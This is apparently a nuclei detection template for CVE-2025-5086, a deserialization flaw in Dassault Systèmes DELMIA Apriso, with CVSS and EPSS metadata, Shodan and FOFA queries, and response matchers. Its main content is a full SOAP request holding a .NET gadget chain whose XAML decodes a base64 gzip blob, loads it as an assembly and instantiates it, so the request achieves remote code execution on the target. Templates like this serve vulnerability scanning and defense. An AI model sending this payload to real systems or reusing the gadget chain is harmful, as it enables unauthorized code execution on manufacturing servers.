漏洞描述
A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution.
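# Template metadata for CVE-2025-5086 (CWE-502, deserialization of untrusted
# data) in Dassault Systèmes DELMIA Apriso, Release 2020 through Release 2025.
# NOTE(review): the `# digest:` line at the end of the file was computed over
# the original template text; presumably it has to be regenerated after any edit.
id: CVE-2025-5086

info:
  name: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization
  author: hacktronai,iamnoooob,pdresearch
  severity: critical
  description: |
    A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution.
  # Fixed releases are not listed in this template; take them from the vendor
  # advisory page referenced below.
  reference:
    - https://www.hacktron.ai/blog/posts/dassault-delmia-apriso-rce/
    - https://www.3ds.com/vulnerability/advisories
  classification:
    # Vector: network-reachable, no privileges or user interaction required,
    # scope changed; attack complexity is rated high.
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2025-5086
    cwe-id: CWE-502
    epss-score: 0.63948
    epss-percentile: 0.98374
  metadata:
    verified: true
    max-request: 1
    # Exposure fingerprints; equally usable for inventorying your own
    # internet-facing Apriso portals.
    shodan-query: html:"apriso"
    fofa-query: body="/Apriso/Portal"
  # The year tag must match the year in the CVE id (2025) so that year-based
  # tag filters select this template.
  tags: cve,cve2025,delmia,apriso,serialization,rce,kev,vkev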
http:
- raw:
- |-
POST /apriso/WebServices/FlexNetOperationsService.svc/Invoke HTTP/2
Host: {{Hostname}}
Content-Type: text/xml
Soapaction: "http://tempuri.org/IFlexNetOperationsService/Invoke"
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<Invoke xmlns="http://tempuri.org/">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"><Count z:Id="2" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Count><Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0" xmlns=""><_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"><Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0" xmlns=""><a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly><a:delegateEntry z:Id="7"><a:assembly z:Ref="6" i:nil="true"/><a:delegateEntry i:nil="true"/><a:methodName z:Id="8">Compare</a:methodName><a:target i:nil="true"/><a:targetTypeAssembly z:Ref="6" i:nil="true"/><a:targetTypeName z:Id="9">System.String</a:targetTypeName><a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type></a:delegateEntry><a:methodName z:Id="11">Parse</a:methodName><a:target i:nil="true"/><a:targetTypeAssembly z:Id="12">PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</a:targetTypeAssembly><a:targetTypeName z:Id="13">System.Windows.Markup.XamlReader</a:targetTypeName><a:type z:Id="14">System.Func`2[[System.String, mscorlib, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type></Delegate><method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><Name z:Ref="11" i:nil="true"/><AssemblyName z:Ref="12" i:nil="true"/><ClassName z:Ref="13" i:nil="true"/><Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Object Parse(System.String)</Signature><Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Object Parse(System.String)</Signature2><MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType><GenericArguments i:nil="true"/></method0><method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><Name z:Ref="8" i:nil="true"/><AssemblyName z:Ref="6" i:nil="true"/><ClassName z:Ref="9" i:nil="true"/><Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature><Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2><MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType><GenericArguments i:nil="true"/></method1></_comparison></Comparer><Version z:Id="23" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2" xmlns=""><string z:Id="25" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><string z:Id="26" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:s="clr-namespace:System;assembly=mscorlib"
xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib"
xmlns:i="clr-namespace:System.IO;assembly=mscorlib"
xmlns:c="clr-namespace:System.IO.Compression;assembly=System"
>
<s:Array x:Key="data" x:FactoryMethod="s:Convert.FromBase64String">
<x:Arguments>
<s:String>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</s:String>
</x:Arguments>
</s:Array>
<i:MemoryStream x:Key="inputStream">
<x:Arguments>
<StaticResource ResourceKey="data"></StaticResource>
</x:Arguments>
</i:MemoryStream>
<c:GZipStream x:Key="gzipStream">
<x:Arguments>
<StaticResource ResourceKey="inputStream"></StaticResource>
<c:CompressionMode>0</c:CompressionMode>
</x:Arguments>
</c:GZipStream>
<s:Array x:Key="buf" x:FactoryMethod="s:Array.CreateInstance">
<x:Arguments>
<x:Type TypeName="s:Byte"/>
<x:Int32>3584</x:Int32>
</x:Arguments>
</s:Array>
<ObjectDataProvider x:Key="tmp" ObjectInstance="{StaticResource gzipStream}" MethodName="Read">
<ObjectDataProvider.MethodParameters>
<StaticResource ResourceKey="buf"></StaticResource>
<x:Int32>0</x:Int32>
<x:Int32>3584</x:Int32>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="asmLoad" ObjectType="{x:Type r:Assembly}" MethodName="Load">
<ObjectDataProvider.MethodParameters>
<StaticResource ResourceKey="buf"></StaticResource>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="types" ObjectInstance="{StaticResource asmLoad}" MethodName="GetTypes">
<ObjectDataProvider.MethodParameters/>
</ObjectDataProvider>
<ObjectDataProvider x:Key="firstType" ObjectInstance="{StaticResource types}" MethodName="GetValue">
<ObjectDataProvider.MethodParameters>
<s:Int32>0</s:Int32>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="createInstance" ObjectInstance="{StaticResource firstType}" MethodName="InvokeMember">
<ObjectDataProvider.MethodParameters>
<x:Null/>
<r:BindingFlags>512</r:BindingFlags>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary></string></Items></ArrayOfstring>
</Invoke>
</s:Body>
</s:Envelope>
# A result is reported only when all three DSL expressions hold (condition: and).
# nuclei exposes response headers as lower-cased DSL variables, so
# `projectdiscovery` refers to a response header of that name and `content_type`
# to Content-Type. NOTE(review): the header is presumably added by the code the
# request body loads, which would make a hit evidence of server-side execution
# rather than a version fingerprint; confirm against the referenced write-up.
# A miss is therefore not proof of a patched host (request filtered upstream,
# different base path); verify the installed release against the vendor advisory.
# Log-side indicator taken from the request above: POST to
# /apriso/WebServices/FlexNetOperationsService.svc/Invoke answered with
# HTTP 500 and Content-Type text/xml.
matchers:
- type: dsl
dsl:
- 'contains(projectdiscovery, "cve-2025-5086")'
- 'contains(content_type, "text/xml")'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022100c2003e9b4480b51887167467134641d9df2ec5e8a401215baae227e2f329f1d302207ccd4062cfc716c4a857d08b84903c23fa047d303bedc7d7d1439d1bc7e628fb:922c64590222798bb761d5b6d8e72950